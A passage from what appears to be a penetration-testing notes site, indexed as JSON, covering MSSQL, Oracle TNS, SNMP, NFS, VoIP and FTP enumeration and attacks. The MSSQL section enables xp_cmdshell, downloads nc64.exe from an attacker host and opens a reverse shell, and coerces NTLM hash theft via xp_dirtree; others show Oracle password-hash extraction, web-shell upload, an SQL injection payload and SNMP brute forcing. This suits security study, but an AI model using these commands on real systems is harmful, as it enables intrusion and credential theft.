    nmap --script ms-sql-info,ms-sql-empty-password,ms-sql-xp-cmdshell,ms-sql-config,ms-sql-ntlm-info,ms-sql-tables,ms-sql-hasdbaccess,ms-sql-dac,ms-sql-dump-hashes --script-args mssql.instance-port=1433,mssql.username=sa,mssql.password=,mssql.instance-name=MSSQLSERVER -sV -p 1433 $ip\n\nsudo nmap --script ms-sql-info,ms-sql-empty-password,ms-sql-xp-cmdshell,ms-sql-config,ms-sql-ntlm-info,ms-sql-tables,ms-sql-hasdbaccess,ms-sql-dac,ms-sql-dump-hashes --script-args mssql.instance-port=1433,mssql.username=sa,mssql.password=,mssql.instance-name=MSSQLSERVER -sV -p 1433 $ip\n

    We can also use Metasploit to run an auxiliary scanner called mssql_ping that will scan the MSSQL service and provide helpful information in our footprinting process.

    ","tags":["mssql","port 1433","impacket"]},{"location":"1433-mssql/#mssql-ping-in-metasploit","title":"MSSQL Ping in Metasploit","text":"
    msf6 auxiliary(scanner/mssql/mssql_ping) > set rhosts 10.129.201.248\n\nrhosts => 10.129.201.248\n\n\nmsf6 auxiliary(scanner/mssql/mssql_ping) > run\n\n[*] 10.129.201.248:       - SQL Server information for 10.129.201.248:\n[+] 10.129.201.248:       -    ServerName      = SQL-01\n[+] 10.129.201.248:       -    InstanceName    = MSSQLSERVER\n[+] 10.129.201.248:       -    IsClustered     = No\n[+] 10.129.201.248:       -    Version         = 15.0.2000.5\n[+] 10.129.201.248:       -    tcp             = 1433\n[+] 10.129.201.248:       -    np              = \\\\SQL-01\\pipe\\sql\\query\n[*] 10.129.201.248:       - Scanned 1 of 1 hosts (100% complete)\n[*] Auxiliary module execution completed\n
    ","tags":["mssql","port 1433","impacket"]},{"location":"1433-mssql/#connecting-with-mssqlclientpy","title":"Connecting with Mssqlclient.py","text":"

    If we can guess or gain access to credentials, this allows us to remotely connect to the MSSQL server and start interacting with databases using T-SQL (Transact-SQL). Authenticating with MSSQL will enable us to interact directly with databases through the SQL Database Engine. From Pwnbox or a personal attack host, we can use Impacket's mssqlclient.py to connect as seen in the output below. Once connected to the server, it may be good to get a lay of the land and list the databases present on the system.

    python3 mssqlclient.py Administrator@$ip -windows-auth  \n# With python3 mssqlclient.py help you can see more options.\n
    ","tags":["mssql","port 1433","impacket"]},{"location":"1433-mssql/#basic-mssql-commands","title":"Basic mssql commands","text":"
    # Get Microsoft SQL server version\nselect @@version;\n\n# Get usernames\nselect user_name()\ngo\n\n# Get databases\nSELECT name FROM master.dbo.sysdatabases\ngo\n\n# Get current database\nSELECT DB_NAME()\ngo\n\n# Get a list of users in the domain\nSELECT name FROM master..syslogins\ngo\n\n# Get a list of users that are sysadmins\nSELECT name FROM master..syslogins WHERE sysadmin = 1\ngo\n\n# And to make sure: \nSELECT is_srvrolemember(\u2018sysadmin\u2019)\ngo\n# If your user is admin, it will return 1.\n\n# Read Local Files in MSSQL\nSELECT * FROM OPENROWSET(BULK N'C:/Windows/System32/drivers/etc/hosts', SINGLE_CLOB) AS Contents\ngo\n
    ","tags":["mssql","port 1433","impacket"]},{"location":"1433-mssql/#attacks","title":"Attacks","text":"","tags":["mssql","port 1433","impacket"]},{"location":"1433-mssql/#executing-cmd-shell-in-a-sql-command-line","title":"Executing cmd shell in a SQL command line","text":"

    Our goal can be to spawn a Windows command shell and pass in a string for execution. For that Microsoft SQL syntaxis has the command xp_cmdshell, that will allow us to use the SQL command line as a CLI.

    Because malicious users sometimes attempt to elevate their privileges by using xp_cmdshell, xp_cmdshell is disabled by default. \u00a0xp_cmdshell\u00a0can be enabled and disabled by using the\u00a0Policy-Based Management\u00a0or by executing\u00a0sp_configure

    sp_configure displays or changes global configuration settings for the current settings. This is how you may take advantage of it:

    # To allow advanced options to be changed.   \nEXECUTE sp_configure 'show advanced options', 1\ngo\n\n# To update the currently configured value for advanced options.  \nRECONFIGURE\ngo\n\n# To enable the feature.  \nEXECUTE sp_configure 'xp_cmdshell', 1\ngo\n\n# To update the currently configured value for this feature.  \nRECONFIGURE\ngo\n

    Note: The Windows process spawned by\u00a0xp_cmdshell\u00a0has the same security rights as the SQL Server service account

    Now we can use the msSQL terminal to execute commands:

    # This will return the .exe files existing in the current directory\nEXEC xp_cmdshell 'dir *.exe'\ngo\n\n# To print a file\nEXECUTE xp_cmdshell 'type c:\\Users\\sql_svc\\Desktop\\user.txt\ngo\n\n# With this (and a \"python3 -m http.server 80\" from our kali serving a file) we can upload a file to the attacked machine, for instance a reverse shell like nc64.exe\nxp_cmdshell \"powershell -c cd C:\\Users\\sql_svc\\Downloads; wget http://IPfromOurKali/nc64.exe -outfile nc64.exe\"\ngo\n\n# We could also bind this cmd.exe through the nc to our listener. For that open a different tab in kali and do a \"nc -lnvp 443\". When launching the reverse shell, we'll get a powershell terminal in this tab by running:\nxp_cmdshell \"powershell -c cd C:\\Users\\sql_svc\\Downloads; .\\nc64.exe -e cmd.exe IPfromOurKali 443\";\n# You could also upload winPEAS and run it from this powershell command line\n

    There are other methods to get command execution, such as adding\u00a0extended stored procedures,\u00a0CLR Assemblies,\u00a0SQL Server Agent Jobs, and\u00a0external scripts.

    ","tags":["mssql","port 1433","impacket"]},{"location":"1433-mssql/#capture-mssql-service-hash","title":"Capture MSSQL Service Hash","text":"

    We can steal the MSSQL service account hash using\u00a0xp_subdirs\u00a0or\u00a0xp_dirtree\u00a0undocumented stored procedures, which use the SMB protocol to retrieve a list of child directories under a specified parent directory from the file system.

    When we use one of these stored procedures and point it to our SMB server, the directory listening functionality will force the server to authenticate and send the NTLMv2 hash of the service account that is running the SQL Server.

    1. First, start Responder or smbserver from impacket.

    2. Run:

    # For XP_DIRTREE Hash Stealing\nEXEC master..xp_dirtree '\\\\$KaliIP\\share\\'\n\n# For XP_SUBDIRS Hash Stealing\nEXEC master..xp_subdirs '\\\\$KaliIP\\share\\\n

    If the service account has access to our server, we will obtain its hash. We can then attempt to crack the hash or relay it to another host.

    3. XP_SUBDIRS Hash Stealing with Responder

    sudo responder -I tun0\n

    4. XP_SUBDIRS Hash Stealing with impacket

    sudo impacket-smbserver share ./ -smb2support\n
    ","tags":["mssql","port 1433","impacket"]},{"location":"1433-mssql/#impersonate-existing-users-with-mssql","title":"Impersonate Existing Users with MSSQL","text":"

    SQL Server has a special permission, named IMPERSONATE, that allows the executing user to take on the permissions of another user or login until the context is reset or the session ends:

    Impersonating sysadmin

    # Identify Users that We Can Impersonate\nSELECT distinct b.name \nFROM sys.server_permissions a \nINNER JOIN sys.server_principals b \nON a.grantor_principal_id = b.principal_id \nWHERE a.permission_name = 'IMPERSONATE'\ngo\n\n# Verify if our current user has the sysadmin role:\nSELECT SYSTEM_USER\nSELECT IS_SRVROLEMEMBER('sysadmin')\ngo\n#  value 0 indicates no sysadmin role, value 1 is sysadmin role\n

    Impersonating sa user

    USE master\nEXECUTE AS LOGIN = 'sa'\nSELECT SYSTEM_USER\nSELECT IS_SRVROLEMEMBER('sysadmin')\ngo\n

    It's recommended to run EXECUTE AS LOGIN within the master DB, because all users, by default, have access to that database.

    To revert the operation and return to our previous user

    REVERT\ngo\n
    ","tags":["mssql","port 1433","impacket"]},{"location":"1433-mssql/#communicate-with-other-databases-with-mssql","title":"Communicate with Other Databases with MSSQL","text":"

    MSSQL\u00a0has a configuration option called\u00a0linked servers. Linked servers are typically configured to enable the database engine to execute a Transact-SQL statement that includes tables in another instance of SQL Server, or another database product such as Oracle.

    If we manage to gain access to a SQL Server with a linked server configured, we may be able to move laterally to that database server.

    # Identify linked Servers in MSSQL\nSELECT srvname, isremote FROM sysservers\ngo\n
    srvname                             isremote\n----------------------------------- --------\nDESKTOP-MFERMN4\\SQLEXPRESS          1\n10.0.0.12\\SQLEXPRESS                0\n\n\n# isremote, where 1 means is a remote server, and 0 is a linked server. \n
    #  Identify the user used for the connection and its privileges:\nEXECUTE('select @@servername, @@version, system_user, is_srvrolemember(''sysadmin'')') AT [10.0.0.12\\SQLEXPRESS]\ngo \n\n# The\u00a0[EXECUTE](https://docs.microsoft.com/en-us/sql/t-sql/language-elements/execute-transact-sql)\u00a0statement can be used to send pass-through commands to linked servers. We add our command between parenthesis and specify the linked server between square brackets (`[ ]`).\n

    If we need to use quotes in our query to the linked server, we need to use single double quotes to escape the single quote. To run multiples commands at once we can divide them up with a semi colon (;).

    ","tags":["mssql","port 1433","impacket"]},{"location":"1433-mssql/#sources-and-resources","title":"Sources and resources","text":"
    • nc64.exe.
    • Impacket: mssqlclient.py.
    • Pentesmonkey Cheat sheet.
    • book.hacktricks.xyz.
    • winPEAS.
    ","tags":["mssql","port 1433","impacket"]},{"location":"1521-oracle-transparent-network-substrate/","title":"1521 - Oracle Transparent Network Substrate (TNS)","text":"

    The Oracle Transparent Network Substrate (TNS) server is a communication protocol that facilitates communication between Oracle databases and applications over networks. TNS supports various networking protocols between Oracle databases and client applications, such as IPX/SPX and TCP/IP protocol stacks. As a result, it has become a preferred solution for managing large, complex databases in the healthcare, finance, and retail industries.

    Addittionaly, it supports IPv6 and SSL/TLS encryption, which make it suitable for Name resolution, Connection management, Load balancing, Security.

    Oracle TNS is often used with other Oracle services like Oracle DBSNMP, Oracle Databases, Oracle Application Server, Oracle Enterprise Manager, Oracle Fusion Middleware, web servers, and many more:

    • Oracle Enterprise Manager: tool for start, stop, or restart an instance, adjust its memory allocation or other configuration parameters, and monitor its performance.
    ","tags":["oracle tns","port 1521","port 162"]},{"location":"1521-oracle-transparent-network-substrate/#footprinting-oracle-tns","title":"Footprinting Oracle TNS","text":"

    Let's now use nmap to scan the default Oracle TNS listener port:

    sudo nmap -p1521 -sV $ip --open\n
    ","tags":["oracle tns","port 1521","port 162"]},{"location":"1521-oracle-transparent-network-substrate/#enumerating-sids","title":"Enumerating SIDs","text":"

    In Oracle relational databases, also known as Oracle RDBMS, there are System Identifiers (SID).

    System Identifiers (SID) are a unique name that identifies a particular database instance. It can have multiple instances, each with its own System ID. An instance is a set of processes and memory structures that interact to manage the database's data.

    The client uses this SID to identify which database instance it wants to connect to. If there is not a SID in the request, then, the default value defined in the tnsnames.ora file is used.

    sudo nmap -p1521 -sV $ip --open --script oracle-sid-brute\n
    ","tags":["oracle tns","port 1521","port 162"]},{"location":"1521-oracle-transparent-network-substrate/#more-enumeration-with-odat","title":"More enumeration with ODAT","text":"

    We can use the odat.py from ODAT tool to retrieve database names, versions, running processes, user accounts, vulnerabilities, misconfigurations,...

    /odat.py all -s $ip\n

    Addittionaly, if you have sysdba admin rights, you might upload a web shell to the target (more in odat)

    ","tags":["oracle tns","port 1521","port 162"]},{"location":"1521-oracle-transparent-network-substrate/#connect-to-oracle-database-sqlplus","title":"Connect to Oracle database: sqlplus","text":"

    If we manage to get some credentials we can connect to the Oracle TNS service with sqlplus.

    sqlplus <username>/<password>@$ip/XE;\n

    In case of this error message ( sqlplus: error while loading shared libraries: libsqlplus.so: cannot open shared object file: No such file or directory), there might be an issue with libraries. Possible solution:

    sudo sh -c \"echo /usr/lib/oracle/12.2/client64/lib > /etc/ld.so.conf.d/oracle-instantclient.conf\";sudo ldconfig\n

    The System Database Admin in an Oracle RDBMS is sysdba. If an user has more privileges that they should have we can try to exploit it as sysdba.

    sqlplus <user>/<password>@$ip/XE as sysdba\n
    ","tags":["oracle tns","port 1521","port 162"]},{"location":"1521-oracle-transparent-network-substrate/#upload-a-web-shell","title":"Upload a web shell","text":"

    If we have sysdba admin rights, we might upload a web shell to the target. This requires the server to run a web server, and we need to know the exact location of the root directory for the webserver.

    # 1. Create a non suspicious web shell \necho \"Oracle File Upload Test\" > testing.txt\n\n# 2. Upload  the shell to linux (/var/www/html) or windows (C:\\\\inetpub\\\\wwwroot):\n./odat.py utlfile -s $ip -d XE -U <user> -P <password> --sysdba --putFile C:\\\\inetpub\\\\wwwroot testing.txt ./testing.txt\n\n## 3. Test if the file upload approach worked with curl, or visit via browser.\ncurl -X GET http://$ip/testing.txt\n
    ","tags":["oracle tns","port 1521","port 162"]},{"location":"1521-oracle-transparent-network-substrate/#oracle-basic-commands","title":"Oracle basic commands","text":"
    # List all available tables in the current database\nselect table_name from all_tables;\n\n# Show the privileges of the current user\nselect * from user_role_privs;\n\n# If we have sysdba admin rights, we might:\n    ## 1. enumerate all databases\nselect * from user_role_privs;\n\n    ## 2. extract Password Hashes\nselect name, password from sys.user$;\n\n    ## 3. upload a web shell to the target. This requires the server to run a web server, and we need to know the exact location of the root directory for the webserver.\n    ## 1. Creating a non suspicious web shell \necho \"Oracle File Upload Test\" > testing.txt\n    ## 2. Uploading the shell to linux (/var/www/html) or windows (C:\\\\inetpub\\\\wwwroot):\n./odat.py utlfile -s $ip -d XE -U <user> -P <password> --sysdba --putFile C:\\\\inetpub\\\\wwwroot testing.txt ./testing.txt\n
    ","tags":["oracle tns","port 1521","port 162"]},{"location":"1521-oracle-transparent-network-substrate/#how-does-oracle-tns-work","title":"How does Oracle TNS work","text":"","tags":["oracle tns","port 1521","port 162"]},{"location":"1521-oracle-transparent-network-substrate/#technical-components","title":"Technical components","text":"

    The listener:

    By default, the listener listens for incoming connections on the TCP/1521 port. However, this default port can be changed during installation or later in the configuration file. The TNS listener is configured to support various network protocols, including TCP/IP, UDP, IPX/SPX, and AppleTalk. The listener can also support multiple network interfaces and listen on specific IP addresses or all available network interfaces. By default, Oracle TNS can be remotely managed in Oracle 8i/9i but not in Oracle 10g/11g.

    Additionally, the listener will use Oracle Net Services to encrypt the communication between the client and the server.

    Configuration files for Oracle TNS

    The configuration files for Oracle TNS are called tnsnames.ora and listener.ora and are typically located in the ORACLE_HOME/network/admin directory. The client-side Oracle Net Services software uses the tnsnames.ora file to resolve service names to network addresses, while the listener process uses the listener.ora file to determine the services it should listen to and the behavior of the listener.

    tnsnames.ora

    Each database or service has a unique entry in the tnsnames.ora file, containing the necessary information for clients to connect to the service. The entry consists of a name for the service, the network location of the service, and the database or service name that clients should use when connecting to the service.

    Code: txt\n>ORCL =\n  (DESCRIPTION =\n    (ADDRESS_LIST =\n      (ADDRESS = (PROTOCOL = TCP)(HOST = 10.129.11.102)(PORT = 1521))\n    )\n    (CONNECT_DATA =\n      (SERVER = DEDICATED)\n      (SERVICE_NAME = orcl)\n    )\n  )\n

    listener.ora

    The listener.ora file is a server-side configuration file that defines the listener process's properties and parameters, which is responsible for receiving incoming client requests and forwarding them to the appropriate Oracle database instance.

    SID_LIST_LISTENER =\n  (SID_LIST =\n    (SID_DESC =\n      (SID_NAME = PDB1)\n      (ORACLE_HOME = C:\\oracle\\product\\19.0.0\\dbhome_1)\n      (GLOBAL_DBNAME = PDB1)\n      (SID_DIRECTORY_LIST =\n        (SID_DIRECTORY =\n          (DIRECTORY_TYPE = TNS_ADMIN)\n          (DIRECTORY = C:\\oracle\\product\\19.0.0\\dbhome_1\\network\\admin)\n        )\n      )\n    )\n  )\n\nLISTENER =\n  (DESCRIPTION_LIST =\n    (DESCRIPTION =\n      (ADDRESS = (PROTOCOL = TCP)(HOST = orcl.inlanefreight.htb)(PORT = 1521))\n      (ADDRESS = (PROTOCOL = IPC)(KEY = EXTPROC1521))\n    )\n  )\n\nADR_BASE_LISTENER = C:\\oracle\n
    ","tags":["oracle tns","port 1521","port 162"]},{"location":"1521-oracle-transparent-network-substrate/#default-passwords","title":"Default passwords","text":"
    • Oracle 9 has a default password, CHANGE_ON_INSTALL.
    • Oracle 10 has no default password set.
    • The Oracle DBSNMP service also uses a default password, dbsnmp.
    ","tags":["oracle tns","port 1521","port 162"]},{"location":"1521-oracle-transparent-network-substrate/#plsql-exclusion-list","title":"PL/SQL Exclusion List","text":"

    Oracle databases can be protected by using so-called PL/SQL Exclusion List (PlsqlExclusionList). It is a user-created text file that needs to be placed in the $ORACLE_HOME/sqldeveloper directory, and it contains the names of PL/SQL packages or types that should be excluded from execution. Once the PL/SQL Exclusion List file is created, it can be loaded into the database instance. It serves as a blacklist that cannot be accessed through the Oracle Application Server.

    Setting Description DESCRIPTION A descriptor that provides a name for the database and its connection type. ADDRESS The network address of the database, which includes the hostname and port number. PROTOCOL The network protocol used for communication with the server PORT The port number used for communication with the server CONNECT_DATA Specifies the attributes of the connection, such as the service name or SID, protocol, and database instance identifier. INSTANCE_NAME The name of the database instance the client wants to connect. SERVICE_NAME The name of the service that the client wants to connect to. SERVER The type of server used for the database connection, such as dedicated or shared. USER The username used to authenticate with the database server. PASSWORD The password used to authenticate with the database server. SECURITY The type of security for the connection. VALIDATE_CERT Whether to validate the certificate using SSL/TLS. SSL_VERSION The version of SSL/TLS to use for the connection. CONNECT_TIMEOUT The time limit in seconds for the client to establish a connection to the database. RECEIVE_TIMEOUT The time limit in seconds for the client to receive a response from the database. SEND_TIMEOUT The time limit in seconds for the client to send a request to the database. SQLNET.EXPIRE_TIME The time limit in seconds for the client to detect a connection has failed. TRACE_LEVEL The level of tracing for the database connection. TRACE_DIRECTORY The directory where the trace files are stored. TRACE_FILE_NAME The name of the trace file. LOG_FILE The file where the log information is stored.","tags":["oracle tns","port 1521","port 162"]},{"location":"1521-oracle-transparent-network-substrate/#extra-bonus-dual","title":"Extra Bonus: DUAL","text":"

    The DUAL is a special one row, one column table present by default in all Oracle databases. The owner of DUAL is SYS, but DUAL can be accessed by every user. This is a possible payload for SQLi:

    '+UNION+SELECT+NULL+FROM+dual--\n

    Oracle syntax requires the use of FROM, but some queries don't requires any table. For these case we use DUAL. Also Oracle doesn't allow the queries that employ information_schema.tables.

    ","tags":["oracle tns","port 1521","port 162"]},{"location":"161-162-snmp/","title":"161-162 SNMP Simple Network Management Protocol","text":"

    Simple Network Management Protocol (SNMP) is an Internet Standard protocol for collecting and organizing information about managed devices on IP networks and for modifying that information to change device behaviour.

    Simple Network Management Protocol (SNMP) was created to monitor network devices. In addition, this protocol can also be used to handle configuration tasks and change settings remotely. SNMP-enabled hardware includes routers, switches, servers, IoT devices, and many other devices that can also be queried and controlled using this standard protocol. Thus, it is a protocol for monitoring and managing network devices.

    Managers: one or more administrative computers that have the task of monitoring or managing a group of hosts or devices on a computer network, the managed device.

    Managed devices: routers, switches, servers, IoT devices, and many other devices.

    Agent: network-management software module that resides on a managed device. An agent has local knowledge of management information and translates that information to or from an SNMP-specific form.

    In addition to the pure exchange of information, SNMP:

    • Transmits control commands using agents over UDP port 161.
    • Enables the use of so-called traps over UDP port 162. These are data packets sent from the SNMP server to the client without being explicitly requested. If a device is configured accordingly, an SNMP trap is sent to the client once a specific event occurs on the server-side.

    Management Information Base (MIB): For the SNMP client and server to exchange the respective values, the available SNMP objects must have unique addresses known on both sides. And at this point, MIB is born.

    MIB is an independent format for storing device information. A MIB is a text file in which all queryable SNMP objects of a device are listed in a standardized tree hierarchy. MIB files are written in the Abstract Syntax Notation One (ASN.1) based ASCII text format.

    They contain Object Identifier (OID), at least one. In addition to the necessary unique address and a name, provides information about the type, access rights, and a description of the respective object. An OID represents a node in a hierarchical namespace. A sequence of numbers uniquely identifies each node, allowing the node's position in the tree to be determined. The longer the chain, the more specific the information. Many nodes in the OID tree contain nothing except references to those below them. The OIDs consist of integers and are usually concatenated by dot notation.

    ","tags":["SNMP","port 161","port 162"]},{"location":"161-162-snmp/#snmpv1-snmpv2-and-snmpv3","title":"SNMPv1, SNMPv2 and SNMPv3","text":"

    SNMP version 1 (SNMPv1) is used for network management and monitoring. SNMPv1 has no built-in authentication mechanism, meaning anyone accessing the network can read and modify network data. Another main flaw of SNMPv1 is that it does not support encryption, meaning that all data is sent in plain text and can be easily intercepted.

    SNMPv2 existed in different versions. The version still exists today is v2c, and the extension c means community-based SNMP. A significant problem with the initial execution of the SNMP protocol is that the community string that provides security is only transmitted in plain text, meaning it has no built-in encryption.

    SNMPv3: The security has been increased enormously for SNMPv3 by security features such as authentication using username and password and transmission encryption (via pre-shared key) of the data. However, the complexity also increases to the same extent, with significantly more configuration options than v2c.

    How can interception happens? Community strings can be seen as passwords that are used to determine whether the requested information can be viewed or not. It is important to note that many organizations are still using SNMPv2, as the transition to SNMPv3 can be very complex, but the services still need to remain active. SNMP Community strings provide information and statistics about a router or device. The manufacturer default community strings of public and private are often unchanged. In SNMP versions 1 and 2c, access is controlled using a plaintext community string, and if we know the name, we can gain access to it. Examination of process parameters might reveal credentials passed on the command line, which might be possible to reuse for other externally accessible services given the prevalence of password reuse in enterprise environments. Routing information, services bound to additional interfaces, and the version of installed software can also be revealed.

    ","tags":["SNMP","port 161","port 162"]},{"location":"161-162-snmp/#footprinting-snmp","title":"Footprinting SNMP","text":"

    There are tools like snmpwalk, onesixtyone, and braa.

    ","tags":["SNMP","port 161","port 162"]},{"location":"161-162-snmp/#snmpwalk","title":"snmpwalk","text":"

    snmpwalk is used to query the OIDs with their information. It retrieves a subtree of management values using SNMP GETNEXT requests.

    snmpwalk -v2c -c public $ip\n
    snmpwalk -v 2c -c public $ip 1.3.6.1.2.1.1.5.0\n
    snmpwalk -v 2c -c private $ip\n

    If we do not know the community string, we can use onesixtyone and SecLists wordlists to identify these community strings.

    ","tags":["SNMP","port 161","port 162"]},{"location":"161-162-snmp/#onesixtyone-fast-and-simple-snmp-scanner","title":"onesixtyone - Fast and simple SNMP scanner","text":"

    A tool such as onesixtyone can be used to brute force the community string names using a dictionary file of common community strings such as the dict.txt file included in the GitHub repo for the tool.

    onesixtyone -c /opt/useful/SecLists/Discovery/SNMP/snmp.txt $ip\n

    When certain community strings are bound to specific IP addresses, they are named with the hostname of the host, and sometimes even symbols are added to these names to make them more challenging to identify.

    ","tags":["SNMP","port 161","port 162"]},{"location":"161-162-snmp/#braa","title":"braa","text":"

    Knowing a community string, we can use braa to brute-force the individual OIDs and enumerate the information behind them.

    braa <community string>@$ip:.1.3.6.*   \n\n    # Example:\n    # braa public@10.129.14.128:.1.3.6.*\n
    ","tags":["SNMP","port 161","port 162"]},{"location":"161-162-snmp/#installing-snmp","title":"Installing SNMP","text":"

    The default configuration of the SNMP daemon is located at /etc/snmp/snmpd.conf. It contains basic settings for the service, which include the IP addresses, ports, MIB, OIDs, authentication, and community strings. See specifics about the configuration of this file in the manpage.

    Some classic misconfigurations are:

    Settings Description rwuser noauth Provides access to the full OID tree without authentication. rwcommunity <community string> <IPv4 address> Provides access to the full OID tree regardless of where the requests were sent from. rwcommunity6 <community string> <IPv6 address> Same access as with rwcommunity with the difference of using IPv6.","tags":["SNMP","port 161","port 162"]},{"location":"161-162-snmp/#more-about-snmp-versioning-and-security","title":"More about SNMP versioning and security","text":"

    Source: wikipedia

    SNMP is available in different versions, each has its own security issues. SNMP v1 sends passwords in clear-text over the network. Therefore, passwords can be read with packet sniffing. SNMP v2 allows password hashing with MD5, but this has to be configured. Virtually all network management software support SNMP v1, but not necessarily SNMP v2 or v3. SNMP v2 was specifically developed to provide data security, that is authentication, privacy and authorization, but only SNMP version 2c gained the endorsement of the Internet Engineering Task Force (IETF), while versions 2u and 2* failed to gain IETF approval due to security issues. SNMP v3 uses MD5, Secure Hash Algorithm (SHA) and keyed algorithms to offer protection against unauthorized data modification and spoofing attacks. If a higher level of security is needed the Data Encryption Standard (DES) can be optionally used in the cipher block chaining mode. SNMP v3 is implemented on Cisco IOS since release 12.0(3)T. SNMPv3 may be subject to brute force and dictionary attacks for guessing the authentication keys, or encryption keys, if these keys are generated from short (weak) passwords or passwords that can be found in a dictionary.

    ","tags":["SNMP","port 161","port 162"]},{"location":"1720-5060-5061-voip/","title":"Ports 1720, 5060 and 5061: VoIP","text":"

    The most common VoIP ports are TCP/5060 and TCP/5061, which are used for the Session Initiation Protocol (SIP). However, the port TCP/1720 may also be used by some VoIP systems for the H.323 protocol, a set of standards for multimedia communication over packet-based networks. Still, SIP is more widely used than H.323 in VoIP systems.

    The most common SIP requests and methods are:

    Method Description INVITE Initiates a session or invites another endpoint to participate. ACK Confirms the receipt of an INVITE request. BYE Terminate a session. CANCEL Cancels a pending INVITE request. REGISTER Registers a SIP user agent (UA) with a SIP server. OPTIONS Requests information about the capabilities of a SIP server or user agent, such as the types of media it supports."},{"location":"2049-nfs-network-file-system/","title":"Port 2049 - NFS Network File System","text":"

    Network File System (NFS) is a network file system developed by Sun Microsystems and has the same purpose as SMB. Its purpose is to access file systems +over a network as if they were local. However, it uses an entirely different protocol. NFS is used between Linux and Unix systems. This means that NFS clients cannot communicate directly with SMB servers.

    NFS is an Internet standard that governs the procedures in a distributed file system. While NFS protocol version 3.0 (NFSv3), which has been in use for many years, authenticates the client computer, this changes with NFSv4. Here, as with the Windows SMB protocol, the user must authenticate.

    Version Features NFSv2 It is older but is supported by many systems and was initially operated entirely over UDP. NFSv3 It has more features, including variable file size and better error reporting, but is not fully compatible with NFSv2 clients. NFSv4 It includes Kerberos, works through firewalls and on the Internet, no longer requires portmappers, supports ACLs, applies state-based operations, and provides performance improvements and high security. It is also the first version to have a stateful protocol.

    NFS is based on the Open Network Computing Remote Procedure Call (ONC-RPC/SUN-RPC) protocol exposed on TCP and UDP ports 111, which uses External Data Representation (XDR) for the system-independent exchange of data. The NFS protocol has no mechanism for authentication or authorization. Instead, authentication is completely shifted to the RPC protocol's options.

    ","tags":["smb","port 2049","port 111","NFS","Network File System"]},{"location":"2049-nfs-network-file-system/#configuration-file","title":"Configuration file","text":"

    The /etc/exports file contains a table of physical filesystems on an NFS server accessible by the clients.

    The default exports file also contains some examples of configuring NFS shares. First, the folder is specified and made available to others, and then the rights they will have on this NFS share are connected to a host or a subnet. Finally, additional options can be added to the hosts or subnets.

    Option Description rw Read and write permissions. ro Read only permissions. sync Synchronous data transfer. (A bit slower) async Asynchronous data transfer. (A bit faster) secure Ports above 1024 will not be used. insecure Ports above 1024 will be used. no_subtree_check This option disables the checking of subdirectory trees. root_squash Assigns all permissions to files of root UID/GID 0 to the UID/GID of anonymous, which prevents root from accessing files on an NFS mount.

    We can take a look at the insecure option. This is dangerous because users can use ports above 1024. The first 1024 ports can only be used by root. This prevents the fact that no users can use sockets above port 1024 for the NFS service and interact with it.

    ","tags":["smb","port 2049","port 111","NFS","Network File System"]},{"location":"2049-nfs-network-file-system/#mounting-a-nfs-shared-folder","title":"Mounting a NFS shared folder","text":"
    # Share the folder `/mnt/nfs` to the subnet $ip\necho '/mnt/nfs  $ip/24(sync,no_subtree_check)' >> /etc/exports\n\n# Restart the NFS service\nsystemctl restart nfs-kernel-server \n\nexportfs\n

    We have shared the folder /mnt/nfs to the subnet IP/24 with the setting shown above. This means that all hosts on the network will be able to mount this NFS share and inspect the contents of this folder.

    ","tags":["smb","port 2049","port 111","NFS","Network File System"]},{"location":"2049-nfs-network-file-system/#footprinting-the-service","title":"Footprinting the service","text":"
    sudo nmap $ip -p111,2049 -sV -sC\n\n# Also, run all NSE NFS scripts\nsudo nmap --script nfs* $ip -sV -p111,2049\n

    Once we have discovered such an NFS service, we can mount it on our local machine. For this, we can create a new empty folder to which the NFS share will be mounted. Once mounted, we can navigate it and view the contents just like our local system.

    # Show Available NFS Shares\nshowmount -e $ip\n\n# Mounting NFS Share\nmkdir target-NFS\nsudo mount -t nfs $ip:/ ./target-NFS/ -o nolock\ncd target-NFS\ntree .\n\n# List Contents with Usernames & Group Names\nls -l mnt/nfs/\n\n# List Contents with UIDs & GUIDs\nls -n mnt/nfs/\n\n# Unmount the shared\nsudo umount ./target-NFS\n

    By default nfs server has root_squash on which makes client access nobody:nogroup. To bypass it, sudo su your user to be root.

    ","tags":["smb","port 2049","port 111","NFS","Network File System"]},{"location":"2049-nfs-network-file-system/#attacking-wrong-configured-nfs","title":"Attacking wrong configured NFS","text":"

    It is important to note that if the root_squash option is set, we cannot edit the backup.sh file even as root.

    We can also use NFS for further escalation. For example, if we have access to the system via SSH and want to read files from another folder that a specific user can read, we would need to upload a shell to the NFS share that has the SUID of that user and then run the shell via the SSH user.

    ","tags":["smb","port 2049","port 111","NFS","Network File System"]},{"location":"2049-nfs-network-file-system/#more","title":"More","text":"

    https://vk9-sec.com/2049-tcp-nfs-enumeration/.

    ","tags":["smb","port 2049","port 111","NFS","Network File System"]},{"location":"21-ftp/","title":"21 ftp","text":"

    The File Transfer Protocol (FTP) is a standard communication protocol used to transfer computer files from a server to a client on a computer network. FTP is built on a client\u2013server model architecture using separate control and data connections between the client and the server. The FTP runs within the application layer of the TCP/IP protocol stack. Thus, it is on the same layer as HTTP or POP.

    FTP users may authenticate themselves with a clear-text sign-in protocol, generally in the form of a username and password. However, they can connect anonymously if the server is configured to allow it. For secure transmission that protects the username and password and encrypts the content, FTP is often secured with SSL/TLS (FTPS) or replaced with SSH File Transfer Protocol (SFTP).

    However, if the network administrators choose to wrap the connection with the SSL/TLS protocol or tunnel the FTP connection through SSH to add a layer of encryption that only the source and destination hosts can decrypt, this would successfully foil most Man-in-the-Middle attacks.

    ","tags":["ftp","port 21","port 20","tftp","vsFTPd"]},{"location":"21-ftp/#how-it-works","title":"How it works","text":"","tags":["ftp","port 21","port 20","tftp","vsFTPd"]},{"location":"21-ftp/#the-connection","title":"The connection","text":"

    1. First, the client and server establish a control channel through TCP port 21. The client sends commands to the server, and the server returns status codes.

    2. Then both communication participants can establish the data channel via TCP port 20. This channel is used exclusively for data transmission, and the protocol watches for errors during this process.

    ","tags":["ftp","port 21","port 20","tftp","vsFTPd"]},{"location":"21-ftp/#active-and-passive-ftp","title":"Active and passive FTP","text":"

    A distinction is made between active and passive FTP. In the active variant, the client establishes the connection as described via TCP port 21 and thus informs the server via which client-side port the server can transmit its responses. However, if a firewall protects the client, the server cannot reply because all external connections are blocked. For this purpose, the passive mode has been developed. Here, the server announces a port through which the client can establish the data channel. Since the client initiates the connection in this method, the firewall does not block the transfer.

    ","tags":["ftp","port 21","port 20","tftp","vsFTPd"]},{"location":"21-ftp/#installation","title":"Installation","text":"

    You may need to install ftp service. Run:

    sudo apt install ftp -y\n

    Then to connect with ftp, run:

    ftp $ip \n

